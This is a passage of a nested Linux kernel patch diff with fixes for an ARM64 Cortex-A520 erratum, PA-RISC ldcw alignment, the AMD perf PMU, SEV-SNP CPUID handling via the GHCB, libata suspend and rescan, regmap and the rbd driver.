+ #define MIDR_NEOVERSE_N2 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_NEOVERSE_N2)
+diff --git a/arch/arm64/kernel/cpu_errata.c b/arch/arm64/kernel/cpu_errata.c
+index 8dbf3c21ea22a..3f917124684c5 100644
+--- a/arch/arm64/kernel/cpu_errata.c
++++ b/arch/arm64/kernel/cpu_errata.c
+@@ -723,6 +723,14 @@ const struct arm64_cpu_capabilities arm64_errata[] = {
+ 		.cpu_enable = cpu_clear_bf16_from_user_emulation,
+ 	},
+ #endif
++#ifdef CONFIG_ARM64_ERRATUM_2966298
++	{
++		.desc = "ARM erratum 2966298",
++		.capability = ARM64_WORKAROUND_2966298,
++		/* Cortex-A520 r0p0 - r0p1 */
++		ERRATA_MIDR_REV_RANGE(MIDR_CORTEX_A520, 0, 0, 1),
++	},
++#endif
+ #ifdef CONFIG_AMPERE_ERRATUM_AC03_CPU_38
+ 	{
+ 		.desc = "AmpereOne erratum AC03_CPU_38",
+diff --git a/arch/arm64/kernel/cpufeature.c b/arch/arm64/kernel/cpufeature.c
+index b3eb53847c96b..770a31c6ed81b 100644
+--- a/arch/arm64/kernel/cpufeature.c
++++ b/arch/arm64/kernel/cpufeature.c
+@@ -212,7 +212,8 @@ static const struct arm64_ftr_bits ftr_id_aa64isar1[] = {
+ };
+ 
+ static const struct arm64_ftr_bits ftr_id_aa64isar2[] = {
+-	ARM64_FTR_BITS(FTR_HIDDEN, FTR_STRICT, FTR_HIGHER_SAFE, ID_AA64ISAR2_EL1_BC_SHIFT, 4, 0),
++	ARM64_FTR_BITS(FTR_HIDDEN, FTR_STRICT, FTR_LOWER_SAFE, ID_AA64ISAR2_EL1_CLRBHB_SHIFT, 4, 0),
++	ARM64_FTR_BITS(FTR_HIDDEN, FTR_STRICT, FTR_LOWER_SAFE, ID_AA64ISAR2_EL1_BC_SHIFT, 4, 0),
+ 	ARM64_FTR_BITS(FTR_VISIBLE_IF_IS_ENABLED(CONFIG_ARM64_PTR_AUTH),
+ 		       FTR_STRICT, FTR_EXACT, ID_AA64ISAR2_EL1_APA3_SHIFT, 4, 0),
+ 	ARM64_FTR_BITS(FTR_VISIBLE_IF_IS_ENABLED(CONFIG_ARM64_PTR_AUTH),
+diff --git a/arch/arm64/kernel/entry.S b/arch/arm64/kernel/entry.S
+index beb4db21c89c1..de16fa917e1b8 100644
+--- a/arch/arm64/kernel/entry.S
++++ b/arch/arm64/kernel/entry.S
+@@ -419,6 +419,10 @@ alternative_else_nop_endif
+ 	ldp	x28, x29, [sp, #16 * 14]
+ 
+ 	.if	\el == 0
++alternative_if ARM64_WORKAROUND_2966298
++	tlbi	vale1, xzr
++	dsb	nsh
++alternative_else_nop_endif
+ alternative_if_not ARM64_UNMAP_KERNEL_AT_EL0
+ 	ldr	lr, [sp, #S_LR]
+ 	add	sp, sp, #PT_REGS_SIZE		// restore sp
+diff --git a/arch/arm64/tools/cpucaps b/arch/arm64/tools/cpucaps
+index 14d31d1b2ff02..e73830d9f1367 100644
+--- a/arch/arm64/tools/cpucaps
++++ b/arch/arm64/tools/cpucaps
+@@ -71,6 +71,7 @@ WORKAROUND_2064142
+ WORKAROUND_2077057
+ WORKAROUND_2457168
+ WORKAROUND_2658417
++WORKAROUND_2966298
+ WORKAROUND_AMPERE_AC03_CPU_38
+ WORKAROUND_TRBE_OVERWRITE_FILL_MODE
+ WORKAROUND_TSB_FLUSH_FAILURE
+diff --git a/arch/arm64/tools/sysreg b/arch/arm64/tools/sysreg
+index 384757a7eda9e..11c3f7a7cec7b 100644
+--- a/arch/arm64/tools/sysreg
++++ b/arch/arm64/tools/sysreg
+@@ -484,7 +484,11 @@ EndEnum
+ EndSysreg
+ 
+ Sysreg	ID_AA64ISAR2_EL1	3	0	0	6	2
+-Res0	63:28
++Res0	63:32
++Enum	31:28	CLRBHB
++	0b0000	NI
++	0b0001	IMP
++EndEnum
+ Enum	27:24	PAC_frac
+ 	0b0000	NI
+ 	0b0001	IMP
+diff --git a/arch/parisc/include/asm/ldcw.h b/arch/parisc/include/asm/ldcw.h
+index 6d28b5514699a..10a061d6899cd 100644
+--- a/arch/parisc/include/asm/ldcw.h
++++ b/arch/parisc/include/asm/ldcw.h
+@@ -2,14 +2,28 @@
+ #ifndef __PARISC_LDCW_H
+ #define __PARISC_LDCW_H
+ 
+-#ifndef CONFIG_PA20
+ /* Because kmalloc only guarantees 8-byte alignment for kmalloc'd data,
+    and GCC only guarantees 8-byte alignment for stack locals, we can't
+    be assured of 16-byte alignment for atomic lock data even if we
+    specify "__attribute ((aligned(16)))" in the type declaration.  So,
+    we use a struct containing an array of four ints for the atomic lock
+    type and dynamically select the 16-byte aligned int from the array
+-   for the semaphore.  */
++   for the semaphore. */
++
++/* From: "Jim Hull" <jim.hull of hp.com>
++   I've attached a summary of the change, but basically, for PA 2.0, as
++   long as the ",CO" (coherent operation) completer is implemented, then the
++   16-byte alignment requirement for ldcw and ldcd is relaxed, and instead
++   they only require "natural" alignment (4-byte for ldcw, 8-byte for
++   ldcd).
++
++   Although the cache control hint is accepted by all PA 2.0 processors,
++   it is only implemented on PA8800/PA8900 CPUs. Prior PA8X00 CPUs still
++   require 16-byte alignment. If the address is unaligned, the operation
++   of the instruction is undefined. The ldcw instruction does not generate
++   unaligned data reference traps so misaligned accesses are not detected.
++   This hid the problem for years. So, restore the 16-byte alignment dropped
++   by Kyle McMartin in "Remove __ldcw_align for PA-RISC 2.0 processors". */
+ 
+ #define __PA_LDCW_ALIGNMENT	16
+ #define __PA_LDCW_ALIGN_ORDER	4
+@@ -19,22 +33,12 @@
+ 		& ~(__PA_LDCW_ALIGNMENT - 1);			\
+ 	(volatile unsigned int *) __ret;			\
+ })
+-#define __LDCW	"ldcw"
+ 
+-#else /*CONFIG_PA20*/
+-/* From: "Jim Hull" <jim.hull of hp.com>
+-   I've attached a summary of the change, but basically, for PA 2.0, as
+-   long as the ",CO" (coherent operation) completer is specified, then the
+-   16-byte alignment requirement for ldcw and ldcd is relaxed, and instead
+-   they only require "natural" alignment (4-byte for ldcw, 8-byte for
+-   ldcd). */
+-
+-#define __PA_LDCW_ALIGNMENT	4
+-#define __PA_LDCW_ALIGN_ORDER	2
+-#define __ldcw_align(a) (&(a)->slock)
++#ifdef CONFIG_PA20
+ #define __LDCW	"ldcw,co"
+-
+-#endif /*!CONFIG_PA20*/
++#else
++#define __LDCW	"ldcw"
++#endif
+ 
+ /* LDCW, the only atomic read-write operation PA-RISC has. *sigh*.
+    We don't explicitly expose that "*a" may be written as reload
+diff --git a/arch/parisc/include/asm/spinlock_types.h b/arch/parisc/include/asm/spinlock_types.h
+index ca39ee350c3f4..35c5086b74d70 100644
+--- a/arch/parisc/include/asm/spinlock_types.h
++++ b/arch/parisc/include/asm/spinlock_types.h
+@@ -3,13 +3,8 @@
+ #define __ASM_SPINLOCK_TYPES_H
+ 
+ typedef struct {
+-#ifdef CONFIG_PA20
+-	volatile unsigned int slock;
+-# define __ARCH_SPIN_LOCK_UNLOCKED { 1 }
+-#else
+ 	volatile unsigned int lock[4];
+ # define __ARCH_SPIN_LOCK_UNLOCKED	{ { 1, 1, 1, 1 } }
+-#endif
+ } arch_spinlock_t;
+ 
+ 
+diff --git a/arch/parisc/kernel/smp.c b/arch/parisc/kernel/smp.c
+index 7dbd92cafae38..e37ec05487308 100644
+--- a/arch/parisc/kernel/smp.c
++++ b/arch/parisc/kernel/smp.c
+@@ -443,7 +443,9 @@ int __cpu_up(unsigned int cpu, struct task_struct *tidle)
+ 	if (cpu_online(cpu))
+ 		return 0;
+ 
+-	if (num_online_cpus() < setup_max_cpus && smp_boot_one_cpu(cpu, tidle))
++	if (num_online_cpus() < nr_cpu_ids &&
++		num_online_cpus() < setup_max_cpus &&
++		smp_boot_one_cpu(cpu, tidle))
+ 		return -EIO;
+ 
+ 	return cpu_online(cpu) ? 0 : -EIO;
+diff --git a/arch/x86/events/amd/core.c b/arch/x86/events/amd/core.c
+index 6672a3f05fc68..04f4b96dec6df 100644
+--- a/arch/x86/events/amd/core.c
++++ b/arch/x86/events/amd/core.c
+@@ -534,8 +534,12 @@ static void amd_pmu_cpu_reset(int cpu)
+ 	/* Clear enable bits i.e. PerfCntrGlobalCtl.PerfCntrEn */
+ 	wrmsrl(MSR_AMD64_PERF_CNTR_GLOBAL_CTL, 0);
+ 
+-	/* Clear overflow bits i.e. PerfCntrGLobalStatus.PerfCntrOvfl */
+-	wrmsrl(MSR_AMD64_PERF_CNTR_GLOBAL_STATUS_CLR, amd_pmu_global_cntr_mask);
++	/*
++	 * Clear freeze and overflow bits i.e. PerfCntrGLobalStatus.LbrFreeze
++	 * and PerfCntrGLobalStatus.PerfCntrOvfl
++	 */
++	wrmsrl(MSR_AMD64_PERF_CNTR_GLOBAL_STATUS_CLR,
++	       GLOBAL_STATUS_LBRS_FROZEN | amd_pmu_global_cntr_mask);
+ }
+ 
+ static int amd_pmu_cpu_prepare(int cpu)
+@@ -570,6 +574,7 @@ static void amd_pmu_cpu_starting(int cpu)
+ 	int i, nb_id;
+ 
+ 	cpuc->perf_ctr_virt_mask = AMD64_EVENTSEL_HOSTONLY;
++	amd_pmu_cpu_reset(cpu);
+ 
+ 	if (!x86_pmu.amd_nb_constraints)
+ 		return;
+@@ -591,8 +596,6 @@ static void amd_pmu_cpu_starting(int cpu)
+ 
+ 	cpuc->amd_nb->nb_id = nb_id;
+ 	cpuc->amd_nb->refcnt++;
+-
+-	amd_pmu_cpu_reset(cpu);
+ }
+ 
+ static void amd_pmu_cpu_dead(int cpu)
+@@ -601,6 +604,7 @@ static void amd_pmu_cpu_dead(int cpu)
+ 
+ 	kfree(cpuhw->lbr_sel);
+ 	cpuhw->lbr_sel = NULL;
++	amd_pmu_cpu_reset(cpu);
+ 
+ 	if (!x86_pmu.amd_nb_constraints)
+ 		return;
+@@ -613,8 +617,6 @@ static void amd_pmu_cpu_dead(int cpu)
+ 
+ 		cpuhw->amd_nb = NULL;
+ 	}
+-
+-	amd_pmu_cpu_reset(cpu);
+ }
+ 
+ static inline void amd_pmu_set_global_ctl(u64 ctl)
+@@ -884,7 +886,7 @@ static int amd_pmu_v2_handle_irq(struct pt_regs *regs)
+ 	struct hw_perf_event *hwc;
+ 	struct perf_event *event;
+ 	int handled = 0, idx;
+-	u64 status, mask;
++	u64 reserved, status, mask;
+ 	bool pmu_enabled;
+ 
+ 	/*
+@@ -909,6 +911,14 @@ static int amd_pmu_v2_handle_irq(struct pt_regs *regs)
+ 		status &= ~GLOBAL_STATUS_LBRS_FROZEN;
+ 	}
+ 
++	reserved = status & ~amd_pmu_global_cntr_mask;
++	if (reserved)
++		pr_warn_once("Reserved PerfCntrGlobalStatus bits are set (0x%llx), please consider updating microcode\n",
++			     reserved);
++
++	/* Clear any reserved bits set by buggy microcode */
++	status &= amd_pmu_global_cntr_mask;
++
+ 	for (idx = 0; idx < x86_pmu.num_counters; idx++) {
+ 		if (!test_bit(idx, cpuc->active_mask))
+ 			continue;
+diff --git a/arch/x86/kernel/sev-shared.c b/arch/x86/kernel/sev-shared.c
+index 3a5b0c9c4fccc..7dce812ce2538 100644
+--- a/arch/x86/kernel/sev-shared.c
++++ b/arch/x86/kernel/sev-shared.c
+@@ -253,7 +253,7 @@ static int __sev_cpuid_hv(u32 fn, int reg_idx, u32 *reg)
+ 	return 0;
+ }
+ 
+-static int sev_cpuid_hv(struct cpuid_leaf *leaf)
++static int __sev_cpuid_hv_msr(struct cpuid_leaf *leaf)
+ {
+ 	int ret;
+ 
+@@ -276,6 +276,45 @@ static int sev_cpuid_hv(struct cpuid_leaf *leaf)
+ 	return ret;
+ }
+ 
++static int __sev_cpuid_hv_ghcb(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid_leaf *leaf)
++{
++	u32 cr4 = native_read_cr4();
++	int ret;
++
++	ghcb_set_rax(ghcb, leaf->fn);
++	ghcb_set_rcx(ghcb, leaf->subfn);
++
++	if (cr4 & X86_CR4_OSXSAVE)
++		/* Safe to read xcr0 */
++		ghcb_set_xcr0(ghcb, xgetbv(XCR_XFEATURE_ENABLED_MASK));
++	else
++		/* xgetbv will cause #UD - use reset value for xcr0 */
++		ghcb_set_xcr0(ghcb, 1);
++
++	ret = sev_es_ghcb_hv_call(ghcb, ctxt, SVM_EXIT_CPUID, 0, 0);
++	if (ret != ES_OK)
++		return ret;
++
++	if (!(ghcb_rax_is_valid(ghcb) &&
++	      ghcb_rbx_is_valid(ghcb) &&
++	      ghcb_rcx_is_valid(ghcb) &&
++	      ghcb_rdx_is_valid(ghcb)))
++		return ES_VMM_ERROR;
++
++	leaf->eax = ghcb->save.rax;
++	leaf->ebx = ghcb->save.rbx;
++	leaf->ecx = ghcb->save.rcx;
++	leaf->edx = ghcb->save.rdx;
++
++	return ES_OK;
++}
++
++static int sev_cpuid_hv(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid_leaf *leaf)
++{
++	return ghcb ? __sev_cpuid_hv_ghcb(ghcb, ctxt, leaf)
++		    : __sev_cpuid_hv_msr(leaf);
++}
++
+ /*
+  * This may be called early while still running on the initial identity
+  * mapping. Use RIP-relative addressing to obtain the correct address
+@@ -385,19 +424,20 @@ snp_cpuid_get_validated_func(struct cpuid_leaf *leaf)
+ 	return false;
+ }
+ 
+-static void snp_cpuid_hv(struct cpuid_leaf *leaf)
++static void snp_cpuid_hv(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid_leaf *leaf)
+ {
+-	if (sev_cpuid_hv(leaf))
++	if (sev_cpuid_hv(ghcb, ctxt, leaf))
+ 		sev_es_terminate(SEV_TERM_SET_LINUX, GHCB_TERM_CPUID_HV);
+ }
+ 
+-static int snp_cpuid_postprocess(struct cpuid_leaf *leaf)
++static int snp_cpuid_postprocess(struct ghcb *ghcb, struct es_em_ctxt *ctxt,
++				 struct cpuid_leaf *leaf)
+ {
+ 	struct cpuid_leaf leaf_hv = *leaf;
+ 
+ 	switch (leaf->fn) {
+ 	case 0x1:
+-		snp_cpuid_hv(&leaf_hv);
++		snp_cpuid_hv(ghcb, ctxt, &leaf_hv);
+ 
+ 		/* initial APIC ID */
+ 		leaf->ebx = (leaf_hv.ebx & GENMASK(31, 24)) | (leaf->ebx & GENMASK(23, 0));
+@@ -416,7 +456,7 @@ static int snp_cpuid_postprocess(struct cpuid_leaf *leaf)
+ 		break;
+ 	case 0xB:
+ 		leaf_hv.subfn = 0;
+-		snp_cpuid_hv(&leaf_hv);
++		snp_cpuid_hv(ghcb, ctxt, &leaf_hv);
+ 
+ 		/* extended APIC ID */
+ 		leaf->edx = leaf_hv.edx;
+@@ -464,7 +504,7 @@ static int snp_cpuid_postprocess(struct cpuid_leaf *leaf)
+ 		}
+ 		break;
+ 	case 0x8000001E:
+-		snp_cpuid_hv(&leaf_hv);
++		snp_cpuid_hv(ghcb, ctxt, &leaf_hv);
+ 
+ 		/* extended APIC ID */
+ 		leaf->eax = leaf_hv.eax;
+@@ -485,7 +525,7 @@ static int snp_cpuid_postprocess(struct cpuid_leaf *leaf)
+  * Returns -EOPNOTSUPP if feature not enabled. Any other non-zero return value
+  * should be treated as fatal by caller.
+  */
+-static int snp_cpuid(struct cpuid_leaf *leaf)
++static int snp_cpuid(struct ghcb *ghcb, struct es_em_ctxt *ctxt, struct cpuid_leaf *leaf)
+ {
+ 	const struct snp_cpuid_table *cpuid_table = snp_cpuid_get_table();
+ 
+@@ -519,7 +559,7 @@ static int snp_cpuid(struct cpuid_leaf *leaf)
+ 			return 0;
+ 	}
+ 
+-	return snp_cpuid_postprocess(leaf);
++	return snp_cpuid_postprocess(ghcb, ctxt, leaf);
+ }
+ 
+ /*
+@@ -541,14 +581,14 @@ void __init do_vc_no_ghcb(struct pt_regs *regs, unsigned long exit_code)
+ 	leaf.fn = fn;
+ 	leaf.subfn = subfn;
+ 
+-	ret = snp_cpuid(&leaf);
++	ret = snp_cpuid(NULL, NULL, &leaf);
+ 	if (!ret)
+ 		goto cpuid_done;
+ 
+ 	if (ret != -EOPNOTSUPP)
+ 		goto fail;
+ 
+-	if (sev_cpuid_hv(&leaf))
++	if (__sev_cpuid_hv_msr(&leaf))
+ 		goto fail;
+ 
+ cpuid_done:
+@@ -845,14 +885,15 @@ static enum es_result vc_handle_ioio(struct ghcb *ghcb, struct es_em_ctxt *ctxt)
+ 	return ret;
+ }
+ 
+-static int vc_handle_cpuid_snp(struct pt_regs *regs)
++static int vc_handle_cpuid_snp(struct ghcb *ghcb, struct es_em_ctxt *ctxt)
+ {
++	struct pt_regs *regs = ctxt->regs;
+ 	struct cpuid_leaf leaf;
+ 	int ret;
+ 
+ 	leaf.fn = regs->ax;
+ 	leaf.subfn = regs->cx;
+-	ret = snp_cpuid(&leaf);
++	ret = snp_cpuid(ghcb, ctxt, &leaf);
+ 	if (!ret) {
+ 		regs->ax = leaf.eax;
+ 		regs->bx = leaf.ebx;
+@@ -871,7 +912,7 @@ static enum es_result vc_handle_cpuid(struct ghcb *ghcb,
+ 	enum es_result ret;
+ 	int snp_cpuid_ret;
+ 
+-	snp_cpuid_ret = vc_handle_cpuid_snp(regs);
++	snp_cpuid_ret = vc_handle_cpuid_snp(ghcb, ctxt);
+ 	if (!snp_cpuid_ret)
+ 		return ES_OK;
+ 	if (snp_cpuid_ret != -EOPNOTSUPP)
+diff --git a/block/blk-sysfs.c b/block/blk-sysfs.c
+index a582ea0da74f5..a82bdec923b21 100644
+--- a/block/blk-sysfs.c
++++ b/block/blk-sysfs.c
+@@ -737,6 +737,7 @@ static void blk_free_queue_rcu(struct rcu_head *rcu_head)
+ 	struct request_queue *q = container_of(rcu_head, struct request_queue,
+ 					       rcu_head);
+ 
++	percpu_ref_exit(&q->q_usage_counter);
+ 	kmem_cache_free(blk_get_queue_kmem_cache(blk_queue_has_srcu(q)), q);
+ }
+ 
+@@ -762,8 +763,6 @@ static void blk_release_queue(struct kobject *kobj)
+ 
+ 	might_sleep();
+ 
+-	percpu_ref_exit(&q->q_usage_counter);
+-
+ 	if (q->poll_stat)
+ 		blk_stat_remove_callback(q, q->poll_cb);
+ 	blk_stat_free_callback(q->poll_cb);
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index 25b9bdf2fc380..6a053cd0cf410 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -5022,11 +5022,27 @@ static const unsigned int ata_port_suspend_ehi = ATA_EHI_QUIET
+ 
+ static void ata_port_suspend(struct ata_port *ap, pm_message_t mesg)
+ {
++	/*
++	 * We are about to suspend the port, so we do not care about
++	 * scsi_rescan_device() calls scheduled by previous resume operations.
++	 * The next resume will schedule the rescan again. So cancel any rescan
++	 * that is not done yet.
++	 */
++	cancel_delayed_work_sync(&ap->scsi_rescan_task);
++
+ 	ata_port_request_pm(ap, mesg, 0, ata_port_suspend_ehi, false);
+ }
+ 
+ static void ata_port_suspend_async(struct ata_port *ap, pm_message_t mesg)
+ {
++	/*
++	 * We are about to suspend the port, so we do not care about
++	 * scsi_rescan_device() calls scheduled by previous resume operations.
++	 * The next resume will schedule the rescan again. So cancel any rescan
++	 * that is not done yet.
++	 */
++	cancel_delayed_work_sync(&ap->scsi_rescan_task);
++
+ 	ata_port_request_pm(ap, mesg, 0, ata_port_suspend_ehi, true);
+ }
+ 
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index d28628b964e29..7b9c9264b9a72 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -1081,7 +1081,15 @@ int ata_scsi_dev_config(struct scsi_device *sdev, struct ata_device *dev)
+ 		}
+ 	} else {
+ 		sdev->sector_size = ata_id_logical_sector_size(dev->id);
+-		sdev->manage_start_stop = 1;
++		/*
++		 * Stop the drive on suspend but do not issue START STOP UNIT
++		 * on resume as this is not necessary and may fail: the device
++		 * will be woken up by ata_port_pm_resume() with a port reset
++		 * and device revalidation.
++		 */
++		sdev->manage_system_start_stop = true;
++		sdev->manage_runtime_start_stop = true;
++		sdev->no_start_on_resume = 1;
+ 	}
+ 
+ 	/*
+@@ -4640,7 +4648,7 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 	struct ata_link *link;
+ 	struct ata_device *dev;
+ 	unsigned long flags;
+-	bool delay_rescan = false;
++	int ret = 0;
+ 
+ 	mutex_lock(&ap->scsi_scan_mutex);
+ 	spin_lock_irqsave(ap->lock, flags);
+@@ -4649,37 +4657,34 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 		ata_for_each_dev(dev, link, ENABLED) {
+ 			struct scsi_device *sdev = dev->sdev;
+ 
++			/*
++			 * If the port was suspended before this was scheduled,
++			 * bail out.
++			 */
++			if (ap->pflags & ATA_PFLAG_SUSPENDED)
++				goto unlock;
++
+ 			if (!sdev)
+ 				continue;
+ 			if (scsi_device_get(sdev))
+ 				continue;
+ 
+-			/*
+-			 * If the rescan work was scheduled because of a resume
+-			 * event, the port is already fully resumed, but the
+-			 * SCSI device may not yet be fully resumed. In such
+-			 * case, executing scsi_rescan_device() may cause a
+-			 * deadlock with the PM code on device_lock(). Prevent
+-			 * this by giving up and retrying rescan after a short
+-			 * delay.
+-			 */
+-			delay_rescan = sdev->sdev_gendev.power.is_suspended;
+-			if (delay_rescan) {
+-				scsi_device_put(sdev);
+-				break;
+-			}
+-
+ 			spin_unlock_irqrestore(ap->lock, flags);
+-			scsi_rescan_device(&(sdev->sdev_gendev));
++			ret = scsi_rescan_device(sdev);
+ 			scsi_device_put(sdev);
+ 			spin_lock_irqsave(ap->lock, flags);
++
++			if (ret)
++				goto unlock;
+ 		}
+ 	}
+ 
++unlock:
+ 	spin_unlock_irqrestore(ap->lock, flags);
+ 	mutex_unlock(&ap->scsi_scan_mutex);
+ 
+-	if (delay_rescan)
++	/* Reschedule with a delay if scsi_rescan_device() returned an error */
++	if (ret)
+ 		schedule_delayed_work(&ap->scsi_rescan_task,
+ 				      msecs_to_jiffies(5));
+ }
+diff --git a/drivers/base/regmap/regcache-rbtree.c b/drivers/base/regmap/regcache-rbtree.c
+index ae6b8788d5f3f..d65715b9e129e 100644
+--- a/drivers/base/regmap/regcache-rbtree.c
++++ b/drivers/base/regmap/regcache-rbtree.c
+@@ -453,7 +453,8 @@ static int regcache_rbtree_write(struct regmap *map, unsigned int reg,
+ 		if (!rbnode)
+ 			return -ENOMEM;
+ 		regcache_rbtree_set_register(map, rbnode,
+-					     reg - rbnode->base_reg, value);
++					     (reg - rbnode->base_reg) / map->reg_stride,
++					     value);
+ 		regcache_rbtree_insert(map, &rbtree_ctx->root, rbnode);
+ 		rbtree_ctx->cached_rbnode = rbnode;
+ 	}
+diff --git a/drivers/block/rbd.c b/drivers/block/rbd.c
+index 74ef3da545361..afc92869cba42 100644
+--- a/drivers/block/rbd.c
++++ b/drivers/block/rbd.c
+@@ -632,9 +632,8 @@ void rbd_warn(struct rbd_device *rbd_dev, const char *fmt, ...)
+ static void rbd_dev_remove_parent(struct rbd_device *rbd_dev);
+ 
+ static int rbd_dev_refresh(struct rbd_device *rbd_dev);
+-static int rbd_dev_v2_header_onetime(struct rbd_device *rbd_dev);
+-static int rbd_dev_header_info(struct rbd_device *rbd_dev);
+-static int rbd_dev_v2_parent_info(struct rbd_device *rbd_dev);
++static int rbd_dev_v2_header_onetime(struct rbd_device *rbd_dev,
++				     struct rbd_image_header *header);
+ static const char *rbd_dev_v2_snap_name(struct rbd_device *rbd_dev,
+ 					u64 snap_id);
+ static int _rbd_dev_v2_snap_size(struct rbd_device *rbd_dev, u64 snap_id,
+@@ -995,15 +994,24 @@ static void rbd_init_layout(struct rbd_device *rbd_dev)
+ 	RCU_INIT_POINTER(rbd_dev->layout.pool_ns, NULL);
+ }
+ 
++static void rbd_image_header_cleanup(struct rbd_image_header *header)
++{
++	kfree(header->object_prefix);
++	ceph_put_snap_context(header->snapc);
++	kfree(header->snap_sizes);
++	kfree(header->snap_names);
++
++	memset(header, 0, sizeof(*header));
++}
++
+ /*
+  * Fill an rbd image header with information from the given format 1
+  * on-disk header.
+  */
+-static int rbd_header_from_disk(struct rbd_device *rbd_dev,
+-				 struct rbd_image_header_ondisk *ondisk)
++static int rbd_header_from_disk(struct rbd_image_header *header,
++				struct rbd_image_header_ondisk *ondisk,
++				bool first_time)
+ {
+-	struct rbd_image_header *header = &rbd_dev->header;
+-	bool first_time = header->object_prefix == NULL;
+ 	struct ceph_snap_context *snapc;
+ 	char *object_prefix = NULL;
+ 	char *snap_names = NULL;
+@@ -1070,11 +1078,6 @@ static int rbd_header_from_disk(struct rbd_device *rbd_dev,
+ 	if (first_time) {
+ 		header->object_prefix = object_prefix;
+ 		header->obj_order = ondisk->options.order;
+-		rbd_init_layout(rbd_dev);
+-	} else {
+-		ceph_put_snap_context(header->snapc);
+-		kfree(header->snap_names);
+-		kfree(header->snap_sizes);
+ 	}
+ 
+ 	/* The remaining fields always get updated (when we refresh) */
+@@ -4860,7 +4863,9 @@ out_req:
+  * return, the rbd_dev->header field will contain up-to-date
+  * information about the image.
+  */
+-static int rbd_dev_v1_header_info(struct rbd_device *rbd_dev)
++static int rbd_dev_v1_header_info(struct rbd_device *rbd_dev,
++				  struct rbd_image_header *header,
++				  bool first_time)
+ {
+ 	struct rbd_image_header_ondisk *ondisk = NULL;
+ 	u32 snap_count = 0;
+@@ -4908,7 +4913,7 @@ static int rbd_dev_v1_header_info(struct rbd_device *rbd_dev)
+ 		snap_count = le32_to_cpu(ondisk->snap_count);
+ 	} while (snap_count != want_count);
+ 
+-	ret = rbd_header_from_disk(rbd_dev, ondisk);
++	ret = rbd_header_from_disk(header, ondisk, first_time);
+ out:
+ 	kfree(ondisk);
+ 
+@@ -4932,39 +4937,6 @@ static void rbd_dev_update_size(struct rbd_device *rbd_dev)
+ 	}
+ }
+ 
+-static int rbd_dev_refresh(struct rbd_device *rbd_dev)
+-{
+-	u64 mapping_size;
+-	int ret;
+-
+-	down_write(&rbd_dev->header_rwsem);
+-	mapping_size = rbd_dev->mapping.size;
+-
+-	ret = rbd_dev_header_info(rbd_dev);
+-	if (ret)
+-		goto out;
+-
+-	/*
+-	 * If there is a parent, see if it has disappeared due to the
+-	 * mapped image getting flattened.
+-	 */
+-	if (rbd_dev->parent) {
+-		ret = rbd_dev_v2_parent_info(rbd_dev);
+-		if (ret)
+-			goto out;
+-	}
+-
+-	rbd_assert(!rbd_is_snap(rbd_dev));
+-	rbd_dev->mapping.size = rbd_dev->header.image_size;
+-
+-out:
+-	up_write(&rbd_dev->header_rwsem);
+-	if (!ret && mapping_size != rbd_dev->mapping.size)
+-		rbd_dev_update_size(rbd_dev);
+-
+-	return ret;
+-}
+-
+ static const struct blk_mq_ops rbd_mq_ops = {
+ 	.queue_rq	= rbd_queue_rq,
+ };
+@@ -5504,17 +5476,12 @@ static int _rbd_dev_v2_snap_size(struct rbd_device *rbd_dev, u64 snap_id,
+ 	return 0;
+ }
+ 
+-static int rbd_dev_v2_image_size(struct rbd_device *rbd_dev)
+-{
+-	return _rbd_dev_v2_snap_size(rbd_dev, CEPH_NOSNAP,
+-					&rbd_dev->header.obj_order,
+-					&rbd_dev->header.image_size);
+-}
+-
+-static int rbd_dev_v2_object_prefix(struct rbd_device *rbd_dev)
++static int rbd_dev_v2_object_prefix(struct rbd_device *rbd_dev,
++				    char **pobject_prefix)
+ {
+ 	size_t size;
+ 	void *reply_buf;
++	char *object_prefix;
+ 	int ret;
+ 	void *p;
+ 
+@@ -5532,16 +5499,16 @@ static int rbd_dev_v2_object_prefix(struct rbd_device *rbd_dev)
+ 		goto out;
+ 
+ 	p = reply_buf;
+-	rbd_dev->header.object_prefix = ceph_extract_encoded_string(&p,
+-						p + ret, NULL, GFP_NOIO);
++	object_prefix = ceph_extract_encoded_string(&p, p + ret, NULL,
++						    GFP_NOIO);
++	if (IS_ERR(object_prefix)) {
++		ret = PTR_ERR(object_prefix);
++		goto out;
++	}
+ 	ret = 0;
+ 
+-	if (IS_ERR(rbd_dev->header.object_prefix)) {
+-		ret = PTR_ERR(rbd_dev->header.object_prefix);
+-		rbd_dev->header.object_prefix = NULL;
+-	} else {
+-		dout("  object_prefix = %s\n", rbd_dev->header.object_prefix);
+-	}
++	*pobject_prefix = object_prefix;
++	dout("  object_prefix = %s\n", object_prefix);
+ out:
+ 	kfree(reply_buf);
+ 
+@@ -5592,13 +5559,6 @@ static int _rbd_dev_v2_snap_features(struct rbd_device *rbd_dev, u64 snap_id,
+ 	return 0;
+ }
+ 
+-static int rbd_dev_v2_features(struct rbd_device *rbd_dev)
+-{
+-	return _rbd_dev_v2_snap_features(rbd_dev, CEPH_NOSNAP,
+-					 rbd_is_ro(rbd_dev),
+-					 &rbd_dev->header.features);
+-}
+-
+ /*
+  * These are generic image flags, but since they are used only for
+  * object map, store them in rbd_dev->object_map_flags.
+@@ -5635,6 +5595,14 @@ struct parent_image_info {
+ 	u64		overlap;
+ };
+ 
++static void rbd_parent_info_cleanup(struct parent_image_info *pii)
++{
++	kfree(pii->pool_ns);
++	kfree(pii->image_id);
++
++	memset(pii, 0, sizeof(*pii));
++}
++
+ /*
+  * The caller is responsible for @pii.
+  */
+@@ -5704,6 +5672,9 @@ static int __get_parent_info(struct rbd_device *rbd_dev,
+ 	if (pii->has_overlap)
+ 		ceph_decode_64_safe(&p, end, pii->overlap, e_inval);
+ 
++	dout("%s pool_id %llu pool_ns %s image_id %s snap_id %llu has_overlap %d overlap %llu\n",
++	     __func__, pii->pool_id, pii->pool_ns, pii->image_id, pii->snap_id,
++	     pii->has_overlap, pii->overlap);
+ 	return 0;
+ 
+ e_inval:
